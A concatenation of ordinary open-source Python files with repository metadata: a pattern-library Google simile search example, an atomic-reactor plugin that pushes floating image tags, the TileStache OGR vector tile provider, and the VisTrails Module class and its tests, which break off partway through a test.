# Veale & Hao's method for finding simile using Google's wildcard (*) support.
# http://afflatus.ucd.ie/Papers/LearningFigurative_CogSci07.pdf)
# This will match results such as "as light as a feather", "as cute as a cupcake", etc.
q = "as * as a *"
# Google is very fast but you can only get up to 100 (10x10) results per query.
for i in range(1,2):
for result in engine.search(q, start=i, count=10, type=SEARCH):
print plaintext(result.description) # plaintext() removes HTML formatting.
print result.url
print result.date
print | piskvorky/pattern | examples/01-web/01-google.py | Python | bsd-3-clause | 1,660 |
"""
Copyright (c) 2019 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
from __future__ import unicode_literals, absolute_import
from atomic_reactor.constants import PLUGIN_PUSH_FLOATING_TAGS_KEY, PLUGIN_GROUP_MANIFESTS_KEY
from atomic_reactor.utils.manifest import ManifestUtil
from atomic_reactor.plugin import ExitPlugin
from atomic_reactor.util import get_floating_images, get_unique_images
class PushFloatingTagsPlugin(ExitPlugin):
"""
Push floating tags to registry
"""
key = PLUGIN_PUSH_FLOATING_TAGS_KEY
is_allowed_to_fail = False
def __init__(self, tasker, workflow):
"""
constructor
:param tasker: DockerTasker instance
:param workflow: DockerBuildWorkflow instance
"""
super(PushFloatingTagsPlugin, self).__init__(tasker, workflow)
self.manifest_util = ManifestUtil(workflow, None, self.log)
def add_floating_tags(self, session, manifest_list_data, floating_images):
list_type = manifest_list_data.get("media_type")
manifest = manifest_list_data.get("manifest")
manifest_digest = manifest_list_data.get("manifest_digest")
for image in floating_images:
target_repo = image.to_str(registry=False, tag=False)
# We have to call store_manifest_in_repository directly for each
# referenced manifest, since each one should be a new tag that requires uploading
# the manifest again
self.log.debug("storing %s as %s", target_repo, image.tag)
self.manifest_util.store_manifest_in_repository(session, manifest, list_type,
target_repo, target_repo, ref=image.tag)
# And store the manifest list in the push_conf
push_conf_registry = self.workflow.push_conf.add_docker_registry(session.registry,
insecure=session.insecure)
for image in floating_images:
push_conf_registry.digests[image.tag] = manifest_digest
registry_image = get_unique_images(self.workflow)[0]
return registry_image.get_repo(explicit_namespace=False), manifest_digest
def run(self):
"""
Run the plugin.
"""
if self.workflow.build_process_failed:
self.log.info('Build failed, skipping %s', PLUGIN_PUSH_FLOATING_TAGS_KEY)
return
floating_tags = get_floating_images(self.workflow)
if not floating_tags:
self.log.info('No floating images to tag, skipping %s', PLUGIN_PUSH_FLOATING_TAGS_KEY)
return
# can't run in the worker build
if not self.workflow.is_orchestrator_build():
self.log.warning('%s cannot be used by a worker builder', PLUGIN_PUSH_FLOATING_TAGS_KEY)
return
manifest_data = self.workflow.postbuild_results.get(PLUGIN_GROUP_MANIFESTS_KEY)
if not manifest_data or not manifest_data.get("manifest_digest"):
self.log.info('No manifest digest available, skipping %s',
PLUGIN_PUSH_FLOATING_TAGS_KEY)
return
digests = dict()
for registry in self.manifest_util.registries:
session = self.manifest_util.get_registry_session(registry)
repo, digest = self.add_floating_tags(session, manifest_data, floating_tags)
digests[repo] = digest
return digests
| projectatomic/atomic-reactor | atomic_reactor/plugins/exit_push_floating_tags.py | Python | bsd-3-clause | 3,577 |
""" Provider that returns vector representation of features in a data source.
This is a provider that does not return an image, but rather queries
a data source for raw features and replies with a vector representation
such as GeoJSON. For example, it's possible to retrieve data for
locations of OpenStreetMap points of interest or street centerlines
contained within a tile's boundary.
Many Polymaps (http://polymaps.org) examples use GeoJSON vector data tiles,
which can be effectively created using this provider.
Vector functionality is provided by OGR (http://www.gdal.org/ogr/).
Thank you, Frank Warmerdam.
Currently two serializations and three encodings are supported for a total
of six possible kinds of output with these tile name extensions:
GeoJSON (.geojson):
See http://geojson.org/geojson-spec.html
Arc GeoServices JSON (.arcjson):
See http://www.esri.com/library/whitepapers/pdfs/geoservices-rest-spec.pdf
GeoBSON (.geobson) and Arc GeoServices BSON (.arcbson):
BSON-encoded GeoJSON and Arc JSON, see http://bsonspec.org/#/specification
GeoAMF (.geoamf) and Arc GeoServices AMF (.arcamf):
AMF0-encoded GeoJSON and Arc JSON, see:
http://opensource.adobe.com/wiki/download/attachments/1114283/amf0_spec_121207.pdf
Possible future supported formats might include KML and others. Get in touch
via Github to suggest other formats: http://github.com/migurski/TileStache.
Common parameters:
driver:
String used to identify an OGR driver. Currently, "ESRI Shapefile",
"PostgreSQL", "MySQL", Oracle, Spatialite and "GeoJSON" are supported as
data source drivers, with "postgis" and "shapefile" accepted as synonyms.
Not case-sensitive.
OGR's complete list of potential formats can be found here:
http://www.gdal.org/ogr/ogr_formats.html. Feel free to get in touch via
Github to suggest new formats: http://github.com/migurski/TileStache.
parameters:
Dictionary of parameters for each driver.
PostgreSQL:
"dbname" parameter is required, with name of database.
"host", "user", and "password" are optional connection parameters.
One of "table" or "query" is required, with a table name in the first
case and a complete SQL query in the second.
Shapefile and GeoJSON:
"file" parameter is required, with filesystem path to data file.
properties:
Optional list or dictionary of case-sensitive output property names.
If omitted, all fields from the data source will be included in response.
If a list, treated as a whitelist of field names to include in response.
If a dictionary, treated as a whitelist and re-mapping of field names.
clipped:
Default is true.
Boolean flag for optionally clipping the output geometries to the
bounds of the enclosing tile, or the string value "padded" for clipping
to the bounds of the tile plus 5%. This results in incomplete geometries,
dramatically smaller file sizes, and improves performance and
compatibility with Polymaps (http://polymaps.org).
projected:
Default is false.
Boolean flag for optionally returning geometries in projected rather than
geographic coordinates. Typically this means EPSG:900913 a.k.a. spherical
mercator projection. Stylistically a poor fit for GeoJSON, but useful
when returning Arc GeoServices responses.
precision:
Default is 6.
Optional number of decimal places to use for floating point values.
spacing:
Optional number of tile pixels for spacing geometries in responses. Used
to cut down on the number of returned features by ensuring that only those
features at least this many pixels apart are returned. Order of features
in the data source matters: early features beat out later features.
verbose:
Default is false.
Boolean flag for optionally expanding output with additional whitespace
for readability. Results in larger but more readable GeoJSON responses.
id_property:
Default is None.
Sets the id of the geojson feature to the specified field of the data source.
This can be used, for example, to identify a unique key field for the feature.
Example TileStache provider configuration:
"vector-postgis-points":
{
"provider": {"name": "vector", "driver": "PostgreSQL",
"parameters": {"dbname": "geodata", "user": "geodata",
"table": "planet_osm_point"}}
}
"vector-postgis-lines":
{
"provider": {"name": "vector", "driver": "postgis",
"parameters": {"dbname": "geodata", "user": "geodata",
"table": "planet_osm_line"}}
}
"vector-shapefile-points":
{
"provider": {"name": "vector", "driver": "ESRI Shapefile",
"parameters": {"file": "oakland-uptown-point.shp"},
"properties": ["NAME", "HIGHWAY"]}
}
"vector-shapefile-lines":
{
"provider": {"name": "vector", "driver": "shapefile",
"parameters": {"file": "oakland-uptown-line.shp"},
"properties": {"NAME": "name", "HIGHWAY": "highway"}}
}
"vector-postgis-query":
{
"provider": {"name": "vector", "driver": "PostgreSQL",
"parameters": {"dbname": "geodata", "user": "geodata",
"query": "SELECT osm_id, name, highway, way FROM planet_osm_line WHERE SUBSTR(name, 1, 1) = '1'"}}
}
"vector-sf-streets":
{
"provider": {"name": "vector", "driver": "GeoJSON",
"parameters": {"file": "stclines.json"},
"properties": ["STREETNAME"]}
}
Caveats:
Your data source must have a valid defined projection, or OGR will not know
how to correctly filter and reproject it. Although response tiles are typically
in web (spherical) mercator projection, the actual vector content of responses
is unprojected back to plain WGS84 latitude and longitude.
If you are using PostGIS and spherical mercator a.k.a. SRID 900913,
you can save yourself a world of trouble by using this definition:
http://github.com/straup/postgis-tools/raw/master/spatial_ref_900913-8.3.sql
"""
from re import compile
from urlparse import urlparse, urljoin
try:
from json import JSONEncoder, loads as json_loads
except ImportError:
from simplejson import JSONEncoder, loads as json_loads
try:
from osgeo import ogr, osr
except ImportError:
# At least we'll be able to build the documentation.
pass
from TileStache.Core import KnownUnknown
from TileStache.Geography import getProjectionByName
from Arc import reserialize_to_arc, pyamf_classes
class VectorResponse:
""" Wrapper class for Vector response that makes it behave like a PIL.Image object.
TileStache.getTile() expects to be able to save one of these to a buffer.
Constructor arguments:
- content: Vector data to be serialized, typically a dictionary.
- verbose: Boolean flag to expand response for better legibility.
"""
def __init__(self, content, verbose, precision=6):
self.content = content
self.verbose = verbose
self.precision = precision
def save(self, out, format):
"""
"""
#
# Serialize
#
if format == 'WKT':
if 'wkt' in self.content['crs']:
out.write(self.content['crs']['wkt'])
else:
out.write(_sref_4326().ExportToWkt())
return
if format in ('GeoJSON', 'GeoBSON', 'GeoAMF'):
content = self.content
if 'wkt' in content['crs']:
content['crs'] = {'type': 'link', 'properties': {'href': '0.wkt', 'type': 'ogcwkt'}}
else:
del content['crs']
elif format in ('ArcJSON', 'ArcBSON', 'ArcAMF'):
content = reserialize_to_arc(self.content, format == 'ArcAMF')
else:
raise KnownUnknown('Vector response only saves .geojson, .arcjson, .geobson, .arcbson, .geoamf, .arcamf and .wkt tiles, not "%s"' % format)
#
# Encode
#
if format in ('GeoJSON', 'ArcJSON'):
indent = self.verbose and 2 or None
encoded = JSONEncoder(indent=indent).iterencode(content)
float_pat = compile(r'^-?\d+\.\d+$')
for atom in encoded:
if float_pat.match(atom):
out.write(('%%.%if' % self.precision) % float(atom))
else:
out.write(atom)
elif format in ('GeoBSON', 'ArcBSON'):
import bson
encoded = bson.dumps(content)
out.write(encoded)
elif format in ('GeoAMF', 'ArcAMF'):
import pyamf
for class_name in pyamf_classes.items():
pyamf.register_class(*class_name)
encoded = pyamf.encode(content, 0).read()
out.write(encoded)
def _sref_4326():
"""
"""
sref = osr.SpatialReference()
proj = getProjectionByName('WGS84')
sref.ImportFromProj4(proj.srs)
return sref
def _tile_perimeter(coord, projection, padded):
""" Get a tile's outer edge for a coordinate and a projection.
Returns a list of 17 (x, y) coordinates corresponding to a clockwise
circumambulation of a tile boundary in a given projection. Projection
is like those found in TileStache.Geography, used for tile output.
If padded argument is True, pad bbox by 5% on all sides.
"""
if padded:
ul = projection.coordinateProj(coord.left(0.05).up(0.05))
lr = projection.coordinateProj(coord.down(1.05).right(1.05))
else:
ul = projection.coordinateProj(coord)
lr = projection.coordinateProj(coord.right().down())
xmin, ymin, xmax, ymax = ul.x, ul.y, lr.x, lr.y
xspan, yspan = xmax - xmin, ymax - ymin
perimeter = [
(xmin, ymin),
(xmin + 1 * xspan/4, ymin),
(xmin + 2 * xspan/4, ymin),
(xmin + 3 * xspan/4, ymin),
(xmax, ymin),
(xmax, ymin + 1 * yspan/4),
(xmax, ymin + 2 * yspan/4),
(xmax, ymin + 3 * yspan/4),
(xmax, ymax),
(xmax - 1 * xspan/4, ymax),
(xmax - 2 * xspan/4, ymax),
(xmax - 3 * xspan/4, ymax),
(xmin, ymax),
(xmin, ymax - 1 * yspan/4),
(xmin, ymax - 2 * yspan/4),
(xmin, ymax - 3 * yspan/4),
(xmin, ymin)
]
return perimeter
def _tile_perimeter_width(coord, projection):
""" Get the width in projected coordinates of the coordinate tile polygon.
Uses _tile_perimeter().
"""
perimeter = _tile_perimeter(coord, projection, False)
return perimeter[8][0] - perimeter[0][0]
def _tile_perimeter_geom(coord, projection, padded):
""" Get an OGR Geometry object for a coordinate tile polygon.
Uses _tile_perimeter().
"""
perimeter = _tile_perimeter(coord, projection, padded)
wkt = 'POLYGON((%s))' % ', '.join(['%.3f %.3f' % xy for xy in perimeter])
geom = ogr.CreateGeometryFromWkt(wkt)
ref = osr.SpatialReference()
ref.ImportFromProj4(projection.srs)
geom.AssignSpatialReference(ref)
return geom
def _feature_properties(feature, layer_definition, whitelist=None):
""" Returns a dictionary of feature properties for a feature in a layer.
Third argument is an optional list or dictionary of properties to
whitelist by case-sensitive name - leave it None to include everything.
A dictionary will cause property names to be re-mapped.
OGR property types:
OFTInteger (0), OFTIntegerList (1), OFTReal (2), OFTRealList (3),
OFTString (4), OFTStringList (5), OFTWideString (6), OFTWideStringList (7),
OFTBinary (8), OFTDate (9), OFTTime (10), OFTDateTime (11).
"""
properties = {}
okay_types = ogr.OFTInteger, ogr.OFTReal, ogr.OFTString, ogr.OFTWideString
for index in range(layer_definition.GetFieldCount()):
field_definition = layer_definition.GetFieldDefn(index)
field_type = field_definition.GetType()
if field_type not in okay_types:
try:
name = [oft for oft in dir(ogr) if oft.startswith('OFT') and getattr(ogr, oft) == field_type][0]
except IndexError:
raise KnownUnknown("Found an OGR field type I've never even seen: %d" % field_type)
else:
raise KnownUnknown("Found an OGR field type I don't know what to do with: ogr.%s" % name)
name = field_definition.GetNameRef()
if type(whitelist) in (list, dict) and name not in whitelist:
continue
property = type(whitelist) is dict and whitelist[name] or name
properties[property] = feature.GetField(name)
return properties
def _append_with_delim(s, delim, data, key):
if key in data:
return s + delim + str(data[key])
else:
return s
def _open_layer(driver_name, parameters, dirpath):
""" Open a layer, return it and its datasource.
Dirpath comes from configuration, and is used to locate files.
"""
#
# Set up the driver
#
okay_drivers = {'postgis': 'PostgreSQL', 'esri shapefile': 'ESRI Shapefile',
'postgresql': 'PostgreSQL', 'shapefile': 'ESRI Shapefile',
'geojson': 'GeoJSON', 'spatialite': 'SQLite', 'oracle': 'OCI', 'mysql': 'MySQL'}
if driver_name.lower() not in okay_drivers:
raise KnownUnknown('Got a driver type Vector doesn\'t understand: "%s". Need one of %s.' % (driver_name, ', '.join(okay_drivers.keys())))
driver_name = okay_drivers[driver_name.lower()]
driver = ogr.GetDriverByName(str(driver_name))
#
# Set up the datasource
#
if driver_name == 'PostgreSQL':
if 'dbname' not in parameters:
raise KnownUnknown('Need at least a "dbname" parameter for postgis')
conn_parts = []
for part in ('dbname', 'user', 'host', 'password', 'port'):
if part in parameters:
conn_parts.append("%s='%s'" % (part, parameters[part]))
source_name = 'PG:' + ' '.join(conn_parts)
elif driver_name == 'MySQL':
if 'dbname' not in parameters:
raise KnownUnknown('Need a "dbname" parameter for MySQL')
if 'table' not in parameters:
raise KnownUnknown('Need a "table" parameter for MySQL')
conn_parts = []
for part in ('host', 'port', 'user', 'password'):
if part in parameters:
conn_parts.append("%s=%s" % (part, parameters[part]))
source_name = 'MySql:' + parameters["dbname"] + "," + ','.join(conn_parts) + ",tables=" + parameters['table']
elif driver_name == 'OCI':
if 'host' not in parameters:
raise KnownUnknown('Need a "host" parameter for oracle')
if 'table' not in parameters:
raise KnownUnknown('Need a "table" parameter for oracle')
source_name = 'OCI:'
source_name = _append_with_delim(source_name, '', parameters, 'user')
source_name = _append_with_delim(source_name, '/', parameters, 'password')
if 'user' in parameters:
source_name = source_name + '@'
source_name = source_name + parameters['host']
source_name = _append_with_delim(source_name, ':', parameters, 'port')
source_name = _append_with_delim(source_name, '/', parameters, 'dbname')
source_name = source_name + ":" + parameters['table']
elif driver_name in ('ESRI Shapefile', 'GeoJSON', 'SQLite'):
if 'file' not in parameters:
raise KnownUnknown('Need at least a "file" parameter for a shapefile')
file_href = urljoin(dirpath, parameters['file'])
scheme, h, file_path, q, p, f = urlparse(file_href)
if scheme not in ('file', ''):
raise KnownUnknown('Shapefiles need to be local, not %s' % file_href)
source_name = file_path
datasource = driver.Open(str(source_name))
if datasource is None:
raise KnownUnknown('Couldn\'t open datasource %s' % source_name)
#
# Set up the layer
#
if driver_name == 'PostgreSQL' or driver_name == 'OCI' or driver_name == 'MySQL':
if 'query' in parameters:
layer = datasource.ExecuteSQL(str(parameters['query']))
elif 'table' in parameters:
layer = datasource.GetLayerByName(str(parameters['table']))
else:
raise KnownUnknown('Need at least a "query" or "table" parameter for postgis or oracle')
elif driver_name == 'SQLite':
layer = datasource.GetLayerByName(str(parameters['layer']))
else:
layer = datasource.GetLayer(0)
if layer.GetSpatialRef() is None and driver_name != 'SQLite':
raise KnownUnknown('Couldn\'t get a layer from data source %s' % source_name)
#
# Return the layer and the datasource.
#
# Technically, the datasource is no longer needed
# but layer segfaults when it falls out of scope.
#
return layer, datasource
def _get_features(coord, properties, projection, layer, clipped, projected, spacing, id_property):
""" Return a list of features in an OGR layer with properties in GeoJSON form.
Optionally clip features to coordinate bounding box, and optionally
limit returned features to only those separated by number of pixels
given as spacing.
"""
#
# Prepare output spatial reference - always WGS84.
#
if projected:
output_sref = osr.SpatialReference()
output_sref.ImportFromProj4(projection.srs)
else:
output_sref = _sref_4326()
#
# Load layer information
#
definition = layer.GetLayerDefn()
layer_sref = layer.GetSpatialRef()
if layer_sref == None:
layer_sref = _sref_4326()
#
# Spatially filter the layer
#
bbox = _tile_perimeter_geom(coord, projection, clipped == 'padded')
bbox.TransformTo(layer_sref)
layer.SetSpatialFilter(bbox)
features = []
mask = None
if spacing is not None:
buffer = spacing * _tile_perimeter_width(coord, projection) / 256.
for feature in layer:
geometry = feature.geometry().Clone()
if not geometry.Intersect(bbox):
continue
if mask and geometry.Intersect(mask):
continue
if clipped:
geometry = geometry.Intersection(bbox)
if geometry is None:
# may indicate a TopologyException
continue
# mask out subsequent features if spacing is defined
if mask and buffer:
mask = geometry.Buffer(buffer, 2).Union(mask)
elif spacing is not None:
mask = geometry.Buffer(buffer, 2)
geometry.AssignSpatialReference(layer_sref)
geometry.TransformTo(output_sref)
geom = json_loads(geometry.ExportToJson())
prop = _feature_properties(feature, definition, properties)
geojson_feature = {'type': 'Feature', 'properties': prop, 'geometry': geom}
if id_property != None and id_property in prop:
geojson_feature['id'] = prop[id_property]
features.append(geojson_feature)
return features
class Provider:
""" Vector Provider for OGR datasources.
See module documentation for explanation of constructor arguments.
"""
def __init__(self, layer, driver, parameters, clipped, verbose, projected, spacing, properties, precision, id_property):
self.layer = layer
self.driver = driver
self.clipped = clipped
self.verbose = verbose
self.projected = projected
self.spacing = spacing
self.parameters = parameters
self.properties = properties
self.precision = precision
self.id_property = id_property
def renderTile(self, width, height, srs, coord):
""" Render a single tile, return a VectorResponse instance.
"""
layer, ds = _open_layer(self.driver, self.parameters, self.layer.config.dirpath)
features = _get_features(coord, self.properties, self.layer.projection, layer, self.clipped, self.projected, self.spacing, self.id_property)
response = {'type': 'FeatureCollection', 'features': features}
if self.projected:
sref = osr.SpatialReference()
sref.ImportFromProj4(self.layer.projection.srs)
response['crs'] = {'wkt': sref.ExportToWkt()}
if srs == getProjectionByName('spherical mercator').srs:
response['crs']['wkid'] = 102113
else:
response['crs'] = {'srid': 4326, 'wkid': 4326}
return VectorResponse(response, self.verbose, self.precision)
def getTypeByExtension(self, extension):
""" Get mime-type and format by file extension.
This only accepts "geojson" for the time being.
"""
if extension.lower() == 'geojson':
return 'text/json', 'GeoJSON'
elif extension.lower() == 'arcjson':
return 'text/json', 'ArcJSON'
elif extension.lower() == 'geobson':
return 'application/x-bson', 'GeoBSON'
elif extension.lower() == 'arcbson':
return 'application/x-bson', 'ArcBSON'
elif extension.lower() == 'geoamf':
return 'application/x-amf', 'GeoAMF'
elif extension.lower() == 'arcamf':
return 'application/x-amf', 'ArcAMF'
elif extension.lower() == 'wkt':
return 'text/x-wkt', 'WKT'
raise KnownUnknown('Vector Provider only makes .geojson, .arcjson, .geobson, .arcbson, .geoamf, .arcamf and .wkt tiles, not "%s"' % extension)
| mpuig/TileStache | TileStache/Vector/__init__.py | Python | bsd-3-clause | 22,199 |
###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: [email protected]
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
# Check for testing
""" This module defines the class Module
"""
import copy
from itertools import izip
import weakref
from db.domain import DBModule
from core.data_structures.point import Point
from core.vistrail.annotation import Annotation
from core.vistrail.location import Location
from core.vistrail.module_function import ModuleFunction
from core.vistrail.module_param import ModuleParam
from core.vistrail.port import Port, PortEndPoint
from core.vistrail.port_spec import PortSpec
from core.utils import NoSummon, VistrailsInternalError, report_stack
from core.modules.module_descriptor import OverloadedPort
from core.modules.module_registry import get_module_registry, ModuleRegistry
################################################################################
# A Module stores not only the information, but a method (summon) that
# creates a 'live' object, subclass of core/modules/vistrail_module/Module
class Module(DBModule):
""" Represents a module from a Pipeline """
##########################################################################
# Constructor and copy
def __init__(self, *args, **kwargs):
DBModule.__init__(self, *args, **kwargs)
if self.cache is None:
self.cache = 1
if self.id is None:
self.id = -1
if self.location is None:
self.location = Location(x=-1.0, y=-1.0)
if self.name is None:
self.name = ''
if self.package is None:
self.package = ''
if self.version is None:
self.version = ''
self.set_defaults()
def set_defaults(self, other=None):
if other is None:
self.portVisible = set()
self.visible_input_ports = set()
self.visible_output_ports = set()
self.connected_input_ports = {}
self.connected_output_ports = {}
self.is_valid = False
self.is_breakpoint = False
self.is_watched = False
self._descriptor_info = None
self._module_descriptor = None
else:
self.portVisible = copy.copy(other.portVisible)
self.visible_input_ports = copy.copy(other.visible_input_ports)
self.visible_output_ports = copy.copy(other.visible_output_ports)
self.connected_input_ports = copy.copy(other.connected_input_ports)
self.connected_output_ports = \
copy.copy(other.connected_output_ports)
self.is_valid = other.is_valid
self.is_breakpoint = other.is_breakpoint
self.is_watched = other.is_watched
self._descriptor_info = None
self._module_descriptor = other._module_descriptor
if not self.namespace:
self.namespace = None
self.function_idx = self.db_functions_id_index
self.setup_indices()
def setup_indices(self):
self._input_port_specs = []
self._output_port_specs = []
for port_spec in self.port_spec_list:
if port_spec.type == 'input':
self._input_port_specs.append(port_spec)
elif port_spec.type == 'output':
self._output_port_specs.append(port_spec)
def __copy__(self):
"""__copy__() -> Module - Returns a clone of itself"""
return Module.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBModule.do_copy(self, new_ids, id_scope, id_remap)
cp.__class__ = Module
cp.set_defaults(self)
return cp
@staticmethod
def convert(_module):
if _module.__class__ == Module:
return
_module.__class__ = Module
for _port_spec in _module.db_portSpecs:
PortSpec.convert(_port_spec)
if _module.db_location:
Location.convert(_module.db_location)
for _function in _module.db_functions:
ModuleFunction.convert(_function)
for _annotation in _module.db_get_annotations():
Annotation.convert(_annotation)
_module.set_defaults()
##########################################################################
id = DBModule.db_id
cache = DBModule.db_cache
annotations = DBModule.db_annotations
location = DBModule.db_location
center = DBModule.db_location
name = DBModule.db_name
label = DBModule.db_name
namespace = DBModule.db_namespace
package = DBModule.db_package
version = DBModule.db_version
port_spec_list = DBModule.db_portSpecs
internal_version = ''
# type check this (list, hash)
def _get_functions(self):
self.db_functions.sort(key=lambda x: x.db_pos)
return self.db_functions
def _set_functions(self, functions):
# want to convert functions to hash...?
self.db_functions = functions
functions = property(_get_functions, _set_functions)
def add_function(self, function):
self.db_add_function(function)
def has_function_with_real_id(self, f_id):
return self.db_has_function_with_id(f_id)
def get_function_by_real_id(self, f_id):
return self.db_get_function_by_id(f_id)
def add_annotation(self, annotation):
self.db_add_annotation(annotation)
def delete_annotation(self, annotation):
self.db_delete_annotation(annotation)
def has_annotation_with_key(self, key):
return self.db_has_annotation_with_key(key)
def get_annotation_by_key(self, key):
return self.db_get_annotation_by_key(key)
def toggle_breakpoint(self):
self.is_breakpoint = not self.is_breakpoint
def toggle_watched(self):
self.is_watched = not self.is_watched
def _get_port_specs(self):
return self.db_portSpecs_id_index
port_specs = property(_get_port_specs)
def has_portSpec_with_name(self, name):
return self.db_has_portSpec_with_name(name)
def get_portSpec_by_name(self, name):
return self.db_get_portSpec_by_name(name)
def add_port_spec(self, spec):
DBModule.db_add_portSpec(self, spec)
if spec.type == 'input':
self._input_port_specs.append(spec)
elif spec.type == 'output':
self._output_port_specs.append(spec)
# override DBModule.db_add_portSpec so that _*_port_specs are updated
db_add_portSpec = add_port_spec
def delete_port_spec(self, spec):
if spec.type == 'input':
self._input_port_specs.remove(spec)
elif spec.type == 'output':
self._output_port_specs.remove(spec)
DBModule.db_delete_portSpec(self, spec)
# override DBModule.db_delete_portSpec so that _*_port_specs are updated
db_delete_portSpec = delete_port_spec
def _get_input_port_specs(self):
return sorted(self._input_port_specs,
key=lambda x: (x.sort_key, x.id))
input_port_specs = property(_get_input_port_specs)
def _get_output_port_specs(self):
return sorted(self._output_port_specs,
key=lambda x: (x.sort_key, x.id), reverse=True)
output_port_specs = property(_get_output_port_specs)
def _get_descriptor_info(self):
if self._descriptor_info is None:
self._descriptor_info = (self.package, self.name,
self.namespace, self.version,
str(self.internal_version))
return self._descriptor_info
descriptor_info = property(_get_descriptor_info)
def _get_module_descriptor(self):
if self._module_descriptor is None or \
self._module_descriptor() is None:
reg = get_module_registry()
self._module_descriptor = \
weakref.ref(reg.get_descriptor_by_name(*self.descriptor_info))
return self._module_descriptor()
def _set_module_descriptor(self, descriptor):
self._module_descriptor = weakref.ref(descriptor)
module_descriptor = property(_get_module_descriptor,
_set_module_descriptor)
def get_port_spec(self, port_name, port_type):
"""get_port_spec(port_name: str, port_type: str: ['input' | 'output'])
-> PortSpec
"""
if self.has_portSpec_with_name((port_name, port_type)):
return self.get_portSpec_by_name((port_name, port_type))
desc = self.module_descriptor
reg = get_module_registry()
return reg.get_port_spec_from_descriptor(desc, port_name, port_type)
def has_port_spec(self, port_name, port_type):
if self.has_portSpec_with_name((port_name, port_type)):
return True
reg = get_module_registry()
desc = self.module_descriptor
return reg.has_port_spec_from_descriptor(desc, port_name, port_type)
def summon(self):
result = self.module_descriptor.module()
if self.cache != 1:
result.is_cacheable = lambda *args: False
if hasattr(result, 'input_ports_order'):
result.input_ports_order = [p.name for p in self.input_port_specs]
if hasattr(result, 'output_ports_order'):
result.output_ports_order = [p.name for p in self.output_port_specs]
# output_ports are reversed for display purposes...
result.output_ports_order.reverse()
# FIXME this may not be quite right because we don't have self.registry
# anymore. That said, I'm not sure how self.registry would have
# worked for hybrids...
result.registry = get_module_registry()
return result
def is_group(self):
return False
def is_abstraction(self):
return False
def getNumFunctions(self):
"""getNumFunctions() -> int - Returns the number of functions """
return len(self.functions)
def sourcePorts(self):
"""sourcePorts() -> list of Port
Returns list of source (output) ports module supports.
"""
registry = get_module_registry()
desc = self.module_descriptor
ports = registry.module_source_ports_from_descriptor(True, desc)
ports.extend(self.output_port_specs)
return ports
def destinationPorts(self):
"""destinationPorts() -> list of Port
Returns list of destination (input) ports module supports
"""
registry = get_module_registry()
desc = self.module_descriptor
ports = registry.module_destination_ports_from_descriptor(True, desc)
ports.extend(self.input_port_specs)
return ports
##########################################################################
# Debugging
def show_comparison(self, other):
if type(other) != type(self):
print "Type mismatch"
print type(self), type(other)
elif self.id != other.id:
print "id mismatch"
print self.id, other.id
elif self.name != other.name:
print "name mismatch"
print self.name, other.name
elif self.cache != other.cache:
print "cache mismatch"
print self.cache, other.cache
elif self.location != other.location:
print "location mismatch"
# FIXME Location has no show_comparison
# self.location.show_comparison(other.location)
elif len(self.functions) != len(other.functions):
print "function length mismatch"
print len(self.functions), len(other.functions)
else:
for f, g in izip(self.functions, other.functions):
if f != g:
print "function mismatch"
f.show_comparison(g)
return
print "No difference found"
assert self == other
##########################################################################
# Operators
def __str__(self):
"""__str__() -> str Returns a string representation of itself. """
def get_name():
if self.namespace:
return self.namespace + '|' + self.name
return self.name
return ("(Module '%s:%s' id=%s functions:%s port_specs:%s)@%X" %
(self.package,
get_name(),
self.id,
[str(f) for f in self.functions],
[str(port_spec) for port_spec in self.db_portSpecs],
id(self)))
def __eq__(self, other):
""" __eq__(other: Module) -> boolean
Returns True if self and other have the same attributes. Used by ==
operator.
"""
if type(other) != type(self):
return False
if self.name != other.name:
return False
if self.namespace != other.namespace:
return False
if self.package != other.package:
return False
if self.cache != other.cache:
return False
if self.location != other.location:
return False
if len(self.functions) != len(other.functions):
return False
if len(self.annotations) != len(other.annotations):
return False
for f, g in izip(self.functions, other.functions):
if f != g:
return False
for f, g in izip(self.annotations, other.annotations):
if f != g:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
##########################################################################
# Properties
################################################################################
# Testing
import unittest
class TestModule(unittest.TestCase):
def create_module(self, id_scope=None):
from db.domain import IdScope
if id_scope is None:
id_scope = IdScope()
params = [ModuleParam(id=id_scope.getNewId(ModuleParam.vtType),
type='Int',
val='1')]
functions = [ModuleFunction(id=id_scope.getNewId(ModuleFunction.vtType),
name='value',
parameters=params)]
module = Module(id=id_scope.getNewId(Module.vtType),
name='Float',
package='edu.utah.sci.vistrails.basic',
functions=functions)
return module
def test_copy(self):
"""Check that copy works correctly"""
from db.domain import IdScope
id_scope = IdScope()
m1 = self.create_module(id_scope)
m2 = copy.copy(m1)
self.assertEquals(m1, m2)
self.assertEquals(m1.id, m2.id)
m3 = m1.do_copy(True, id_scope, {})
self.assertEquals(m1, m3)
self.assertNotEquals(m1.id, m3.id)
def test_serialization(self):
""" Check that serialize and unserialize are working properly """
